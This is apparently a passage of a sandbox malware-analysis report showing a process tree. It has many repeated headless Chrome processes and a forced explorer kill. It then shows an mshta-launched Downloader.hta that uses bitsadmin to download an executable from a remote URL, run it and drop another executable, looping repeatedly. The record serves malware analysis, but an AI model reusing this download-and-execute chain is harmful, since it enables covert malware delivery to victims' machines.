      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1160 --field-trial-handle=1256,i,13072624752102380664,17448761209174539615,131072 /prefetch:2
      4⤵
      PID:6200
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1452 --field-trial-handle=1256,i,13072624752102380664,17448761209174539615,131072 /prefetch:8
      4⤵
      PID:6168
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:4560
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4068
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1224 --field-trial-handle=984,i,6957822742860532080,14635483233962844471,131072 /prefetch:2
      4⤵
      PID:6988
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1420 --field-trial-handle=984,i,6957822742860532080,14635483233962844471,131072 /prefetch:8
      4⤵
      PID:4840
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:440
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:6296
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1088 --field-trial-handle=1232,i,4543116125972620416,16710290821358386471,131072 /prefetch:2
      4⤵
      PID:4956
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1452 --field-trial-handle=1232,i,4543116125972620416,16710290821358386471,131072 /prefetch:8
      4⤵
      PID:5996
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:5568
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:6304
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1116 --field-trial-handle=1228,i,10535475727088549807,18213615606620964705,131072 /prefetch:2
      4⤵
      PID:6008
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1404 --field-trial-handle=1228,i,10535475727088549807,18213615606620964705,131072 /prefetch:8
      4⤵
      PID:5992
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:2256
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:1984
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1220 --field-trial-handle=1248,i,1973841749468375489,12433802512918000001,131072 /prefetch:2
      4⤵
      PID:6552
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1456 --field-trial-handle=1248,i,1973841749468375489,12433802512918000001,131072 /prefetch:8
      4⤵
      PID:6656
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:6292
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:6992
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1152 --field-trial-handle=1332,i,11222397645294080960,7571707923755203356,131072 /prefetch:2
      4⤵
      PID:2312
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1460 --field-trial-handle=1332,i,11222397645294080960,7571707923755203356,131072 /prefetch:8
      4⤵
      PID:5724
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:6680
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3972
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1124 --field-trial-handle=1304,i,18215989190600587523,4402761411275948567,131072 /prefetch:2
      4⤵
      PID:4132
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1432 --field-trial-handle=1304,i,18215989190600587523,4402761411275948567,131072 /prefetch:8
      4⤵
      PID:6396
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:5920
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3264
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1108 --field-trial-handle=1288,i,6673575573018788692,6572962648076634545,131072 /prefetch:2
      4⤵
      PID:4040
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1460 --field-trial-handle=1288,i,6673575573018788692,6572962648076634545,131072 /prefetch:8
      4⤵
      PID:6948
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:7120
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4232
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1112 --field-trial-handle=1256,i,13111241325831214135,8280824255867555574,131072 /prefetch:2
      4⤵
      PID:4348
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1424 --field-trial-handle=1256,i,13111241325831214135,8280824255867555574,131072 /prefetch:8
      4⤵
      PID:3876
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:7076
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3524
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1224 --field-trial-handle=1248,i,5008904966503528582,13928163203904343899,131072 /prefetch:2
      4⤵
      PID:4684
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1460 --field-trial-handle=1248,i,5008904966503528582,13928163203904343899,131072 /prefetch:8
      4⤵
      PID:1100
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    3⤵
    PID:3628
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    PID:5764
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    3⤵
    PID:4556
  - - C:\Windows\System32\ie4uinit.exe
      "C:\Windows\System32\ie4uinit.exe" -UserConfig
      4⤵
      PID:6008
    - - C:\Windows\System32\ie4uinit.exe
        
        C:\Windows\System32\ie4uinit.exe -ClearIconCache
        5⤵
        
        PID:3708
    - - C:\Windows\System32\rundll32.exe
        
        C:\Windows\System32\rundll32 advpack.dll,LaunchINFSectionEx C:\Windows\system32\ieuinit.inf,Install,,36
        5⤵
        
        PID:2744
    - - C:\Windows\System32\rundll32.exe
        
        C:\Windows\System32\rundll32 C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m
        5⤵
        
        PID:4204
      - C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
        6⤵
        
        PID:6576
      - C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
        6⤵
        
        PID:6428
  - - C:\Windows\System32\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /s /n /i:/UserInstall C:\Windows\system32\themeui.dll
      4⤵
      PID:940
  - - C:\Program Files\Windows Mail\WinMail.exe
      "C:\Program Files\Windows Mail\WinMail.exe" OCInstallUserConfigOE
      4⤵
      PID:6804
  - - C:\Windows\System32\unregmp2.exe
      "C:\Windows\System32\unregmp2.exe" /FirstLogon /Shortcuts /RegBrowsers /ResetMUI
      4⤵
      PID:4952
  - - C:\Windows\System32\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /s /n /i:U shell32.dll
      4⤵
      PID:5864
  - - C:\Windows\System32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Windows\system32\mscories.dll,Install
      4⤵
      PID:6768
  - - C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe
      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
      4⤵
      PID:3920
    - - C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x140297688,0x140297698,0x1402976a8
        5⤵
        
        PID:4396
    - - C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" --system-level --verbose-logging --installerdata="C:\Program Files\Google\Chrome\Application\master_preferences" --create-shortcuts=2 --install-level=0
        5⤵
        
        PID:4628
      - C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x140297688,0x140297698,0x1402976a8
        6⤵
        
        PID:3596
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2576
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
    3⤵
    - Download via BitsAdmin
    PID:2636
- - C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
    "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1736
  - - C:\Users\Admin\AppData\Roaming\Stand.exe
      "C:\Users\Admin\AppData\Roaming\Stand.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1360
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2532
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        5⤵
        Download via BitsAdmin
        
        PID:1032
    - - C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:476
      - C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2420
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:440
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        7⤵
        
        PID:980
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3068
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:576
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        8⤵
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:2320
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        9⤵
        Download via BitsAdmin
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        9⤵
        
        PID:2232
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2124
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        10⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
